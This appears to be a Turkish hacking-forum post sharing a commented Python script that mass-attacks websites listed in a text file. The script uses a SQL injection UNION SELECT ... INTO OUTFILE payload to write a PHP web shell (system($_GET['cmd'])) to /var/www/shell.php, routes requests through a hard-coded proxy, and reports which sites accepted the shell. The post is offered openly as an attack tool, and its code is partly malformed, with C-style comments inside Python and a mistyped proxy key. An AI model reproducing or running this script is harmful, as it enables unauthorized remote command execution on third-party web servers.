- 25 Tem 2023
- 2
- 10
Herkeze merhaba arkadaşlar
kodlara geçelim
kodlara geçelim
Python:
payload = ' UNION SELECT "<?=system($_GET[%27cmd%27]);?>" INTO OUTFILE "/var/www/shell.php"' //payloadımız
hedef = str(input("[?] HEDEF SITE >>> ")) // hedef siteyi alıyoruz
hedef2 = str(input("[?] HEDEF SITENIN DOMAINI >>> ")) //shell eklenmişmi onun için hedef siteyi domain şeklinde alıyoruz
secim12 = str(input("ÇOKLU SALDIIRI YAPMAK ISTERMISIN E/H \n>>>")) //seçim sunuyoruz
if secim12 == "E": // if ile hangi seçimi seçmiş onu çalıştırıyor
hedef_dosya = str(input("HEDEF SITELERIN TXT DOSYASI >>> ")) //çoklu yapmak için bir txt dosyasının konumunu alıyoruz
hedef_dosya2 = str(input("HEDEF DOSYANIN TXT DOMAIN HALINDE DOSYASI >>> ")) //yine çoklu seçim yapmak için aynı hedef dosyanın txt dosyasının domain hali şeklinde konumunu alıyoruz
oku1 = open(hedef_dosya2,"r").read().splitlines() //hedef txt dosyasının domain olanlarını okuyoruz
lister = [] // lister adında bir liste oluşturuyoruz
for tin in oku1: //hedef domainlerin olduğu txt dosyasınıfor döngüsü ile döngüye alıyoruz
lister.append(tin) //lister adındaki listemize hedef domainlerimizi ekliyoruzki hedefe shell sokma kontrolü için
oku = open(hedef_dosya,"r").read().splitlines() //hedef siteleri okuyoruz | not hedef siteler örneğin şu şekilde txt dosyasında olmak zorunda : http://www.hedefsite.com/index?id=1
t = 0 //t adında bir değişken oluşturup 0 değerini veriyoruz
for ib in oku: //hedef sitelere shell sokma işlemi için hedef sitelerle döngüye başlıyor
try: //bazı siteler bozuksa 404 veriyosa yazılımda da hata vericektir o yüzden try except fonjsiyonunu kullandık
print("[+] SHELL DENEMESI YAPILIYOR SITE -> "+ib) //printide bilin bi zahmet
payload_req = requests.post(ib+payload,proxies={"htto":"http://50.217.226.46:80"},headers={"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1"}) //hedef siteye payload ile istek gönderdik url şeklinde post yani
url = requests.post(lister[t]+"/shell.php")
if "Access denied" in payload_req.text or "Forbidden" in payload_req.text or "404" in url.text or "ERROR" in url.text or "error" in url.text: //siteye giden isteğin kontrolünü yapıyoruz yani siteden gelen responsun "access denied veya error gibi hatalar verirse alttaki printe bize bildirir erişim reddedildi diye"
print("[-] ERISIM REDDEDILDI !")
else:
print("[+] HADI IYISIN SHELL GIRDI -> "+lister[t]+"/shell.php") //eğer belirtilen hatalar yoksa bu siteye shellimizi soktuk demektir
t+=1
except:
print("[-] BAĞLANTI HATASI !")
bu multi olarak sitelere shell request post isteği göndererek shell denemesi yapıyoruz
Allaha emanet dostlar
Allaha emanet dostlar